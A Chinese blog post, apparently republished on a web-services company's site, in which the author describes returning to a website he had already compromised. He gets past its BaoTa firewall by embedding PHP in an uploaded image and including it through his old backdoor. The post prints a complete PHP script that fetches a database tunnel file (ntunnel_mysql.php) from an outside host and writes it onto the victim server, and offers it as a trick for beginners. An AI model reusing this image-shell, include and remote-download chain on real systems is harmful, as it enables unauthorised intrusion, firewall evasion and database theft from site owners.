乐??黑白信息技术有限公司专注于企业安全与网站建设,网站制作,网站设计,网站开发,网页设计,网页制作、小程序、APP架设,为企业客户提供一站式解决方案,帮助企业快速实现互联网+转型。
之前搞下某站,当时他没有开防火墙,导致我直接getshell。
今天突然还想上去看看,发现他开了宝塔防火墙,导致我留的后门失效,菜刀无法连接了。尝试之前的漏洞上传PHP失败,被拦截。
如上图,如果我直接执行一些危险的PHP函数,如phpinfo();都是直接被拦截掉了。。。而执行有的函数,还是可以执行的,那么相当于我还有一点点权限。
遇到这种情况,被防火墙拦截,我第一时间想到的就是文件包含,
将phpinfo(); 复制到一张图片中。然后前台上传图片,然后在利用我的后门包含尝试。
成功包含,这里我们直接传个一句话图片马包含就行,但是目测结果同样会被拦截POST请求。
我不需要进菜刀,我只是需要进下数据库,因此我的目的是将 ntunnel_mysql.php 弄上去,但是因为我后门本身就需要提交POST,如果在包含 ntunnel_mysql.php 这个文件也需要请求POST,他们彼此冲突,所以不能直接包含,这里我换了一种方式,直接远程下载。
<?php function getFile($url, $save_dir = '', $filename = '', $type = 0) { if (trim($url) == '') { return false; } if (trim($save_dir) == '') { $save_dir = './'; } if (0 !== strrpos($save_dir, '/')) { $save_dir.= '/'; } //创建保存目录 if (!file_exists($save_dir) && !mkdir($save_dir, 0777, true)) { return false; } //获取远程文件所采用的方法 if ($type) { $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $content = curl_exec($ch); curl_close($ch); } else { ob_start(); readfile($url); $content = ob_get_contents(); ob_end_clean(); } $size = strlen($content); //文件大小 $fp2 = @fopen($save_dir . $filename, 'a'); fwrite($fp2, $content); fclose($fp2); unset($content, $url); return array( 'file_name' => $filename, 'save_path' => $save_dir . $filename ); } $url = "https://www.xiaoxiaowu.me/ntunnel_mysql.txt"; $save_dir = "/www/xx/xx/xx/xx/xx/06/"; $filename = "test.php"; $res = getFile($url, $save_dir, $filename, 1); var_dump($res); ?>
利用上方代码,远程下载文件,并且保存,这样就可以成为一个独立的PHP文件,不会再POST冲突。
大概流程,将上方代码和图片合并,然后上传图片,然后在用后门包含这个文件,他会直接下载保存。
这个小技巧很多人都懂,送给新手们,大佬漂过。
原文由:Mr.Wu
上一篇:丝绸之路2号创始人被判入狱5年 下一篇:利用PHP生成属于自己的字典
